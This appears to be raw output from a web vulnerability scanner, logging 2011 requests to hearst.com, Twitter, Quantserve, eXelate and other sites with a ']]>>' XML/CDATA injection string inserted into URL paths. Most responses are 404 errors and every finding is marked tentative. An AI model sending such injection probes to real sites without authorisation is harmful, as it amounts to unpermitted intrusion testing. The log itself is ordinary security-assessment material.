Host: | http://hearst.com |
Path: | /newspapers/the-advocate |
GET /newspapers/the-advocate Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:24:10 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /press-room/index.php |
GET /press-room]]>>/index.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:48 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1241 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /press-room/index.php |
GET /press-room/index.php]]>> HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/about User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:51 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1241 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /press-room/pr-20110817a |
GET /press-room]]>>/pr-20110817a.php HTTP/1.1 Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/press User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:48 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://hearst.com |
Path: | /press-room/pr-20110817a |
GET /press-room/pr-20110817a Host: hearst.com Proxy-Connection: keep-alive Referer: http://hearst.com/press User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:23:52 GMT Server: Apache/2.2.3 (Linux/SUSE) Vary: accept-language,accept Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1203 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://img.widgets.video |
Path: | /resource.aspx |
GET /resource.aspx?resources Host: img.widgets.video.s-msn Proxy-Connection: keep-alive Referer: http://www.delish.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: public, max-age=1800 Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 10791 Age: 2 Date: Sat, 17 Sep 2011 16:29:17 GMT Last-Modified: Sat, 17 Sep 2011 16:29:16 GMT Expires: Sat, 17 Sep 2011 16:59:15 GMT Connection: keep-alive ...<?xml version="1.0" encoding="utf-8"?><xml> ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://js.bizographics |
Path: | /show_ad.js |
GET /show_ad.js]]>>?partner_id=454 HTTP/1.1 Host: js.bizographics.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BizographicsOptOut=OPT |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:26:43 GMT Server: PWS/ X-Px: ht h0-s1001.p10-sjc.cdngp Cache-Control: max-age=30 Expires: Sat, 17 Sep 2011 16:27:12 GMT Age: 1 Content-Length: 279 Content-Type: application/xml Connection: keep-alive <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://load.exelator.com |
Path: | /load/OptOut.php |
GET /load]]>>/OptOut.php?service Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBd |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:45:42 GMT Server: HTTP server Connection: Keep-alive Keep-Alive: timeout=15, max=100 Via: 1.1 AN-AMP_TM uproxy-3 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://load.exelator.com |
Path: | /load/OptOut.php |
GET /load/OptOut.php]]>>?service=checkNAI&nocache Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DNP=eXelate+OptOut; DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBd |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:45:42 GMT Server: HTTP server Connection: Keep-alive Keep-Alive: timeout=15, max=100 Via: 1.1 AN-AMP_TM uproxy-5 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://loadus.exelator |
Path: | /load/ |
GET /load]]>>/?p=235&g=001&ctg=&cat= Host: loadus.exelator.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: DNP=eXelate+OptOut; EVX=eJxNy7EJwDAMBMBd |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:28:25 GMT Server: HTTP server Connection: Keep-alive Keep-Alive: timeout=15, max=100 Via: 1.1 AN-AMP_TM uproxy-5 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://origin.chron.com |
Path: | /apps/audit/ads.gif |
GET /apps]]>>/audit/ads.gif?cider=3 Host: origin.chron.com Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:24:19 GMT Server: lighttpd/1.4.19 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://origin.chron.com |
Path: | /apps/audit/ads.gif |
GET /apps/audit]]>>/ads.gif?cider=3;sitepage Host: origin.chron.com Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:24:22 GMT Server: lighttpd/1.4.19 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://origin.chron.com |
Path: | /apps/audit/ads.gif |
GET /apps/audit/ads.gif]]>>?cider=3;sitepage=Not Host: origin.chron.com Proxy-Connection: keep-alive Referer: http://www.stamforda User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:24:23 GMT Server: lighttpd/1.4.28-devel <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /api/segments.json |
GET /api]]>>/segments.json?a=p Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw |
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sat, 17 Sep 2011 16:23:12 GMT Server: QS <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /api/segments.json |
GET /api/segments.json]]>>?a=p-573scDfDoUH6o Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://widget.newsinc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw |
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sat, 17 Sep 2011 16:23:12 GMT Server: QS <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_set |
GET /optout_set]]>>?s=nai&nocache=0.7603821 HTTP/1.1 Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: mc=4e29da7c-0fd05-96398 |
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sat, 17 Sep 2011 17:19:42 GMT Server: QS <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_status |
GET /optout_status]]>>?s=nai&nocache=0.3567882 HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: qoo=OPT_OUT; d=ED8BDAHdB7vRkw |
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sat, 17 Sep 2011 16:45:13 GMT Server: QS <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://pixel.quantserve |
Path: | /optout_verify |
GET /optout_verify]]>>?s=nai&nocache=0.7603821 HTTP/1.1 Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: d=EEsBGgHdB7vR8r2IHh2EoRA |
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 345 Date: Sat, 17 Sep 2011 17:21:03 GMT Server: QS <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/follow_button |
GET /widgets]]>>/follow_button.html Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:28:28 GMT Content-Length: 295 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/follow_button |
GET /widgets/follow_button Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://www.local.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:28:28 GMT Content-Length: 295 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/f.gif |
GET /widgets]]>>/images/f.gif?screen_name Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:28:41 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/f.gif |
GET /widgets/images]]>>/f.gif?screen_name Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:28:42 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/f.gif |
GET /widgets/images/f.gif]]>>?screen_name=localcom Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:28:43 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/t.gif |
GET /widgets]]>>/images/t.gif?_ Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:33:03 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/t.gif |
GET /widgets/images]]>>/t.gif?_=1316294768523 Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:33:04 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://platform.twitter |
Path: | /widgets/images/t.gif |
GET /widgets/images/t.gif]]>>?_=1316294768523&count Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://platform.twitter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: guest_id=v1%3A131479 |
HTTP/1.1 404 Not Found Content-Type: application/xml Date: Sat, 17 Sep 2011 16:33:05 GMT Content-Length: 289 Connection: close P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT" <?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey< ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://s.meebocdn.net |
Path: | /cim/script/feeds_v92_cim |
GET /cim]]>>/script/feeds_v92_cim_11 Host: s.meebocdn.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Server: lighttpd/1.4.19 Date: Sat, 17 Sep 2011 16:36:25 GMT Connection: close Vary: Accept-Encoding <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://s.meebocdn.net |
Path: | /cim/script/feeds_v92_cim |
GET /cim/script]]>>/feeds_v92_cim_11_12_5.en Host: s.meebocdn.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Server: lighttpd/1.4.19 Date: Sat, 17 Sep 2011 16:36:25 GMT Connection: close Vary: Accept-Encoding <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://s.meebocdn.net |
Path: | /cim/script/feeds_v92_cim |
GET /cim/script/feeds_v92_cim Host: s.meebocdn.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Server: lighttpd/1.4.19 Date: Sat, 17 Sep 2011 16:36:25 GMT Connection: close Vary: Accept-Encoding <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://s.ytimg.com |
Path: | /yt/swfbin/cps-vflP_j6Bm |
GET /yt/swfbin]]>>/cps-vflP_j6Bm.swf HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Sat, 17 Sep 2011 16:48:11 GMT Server: lighttpd-yt/1.4.18 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w ...[SNIP]... |
Severity: | Medium |
Confidence: | Tentative |
Host: | http://s.ytimg.com |
Path: | /yt/swfbin/cps-vflP_j6Bm |
GET /yt/swfbin/cps-vflP_j6Bm Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
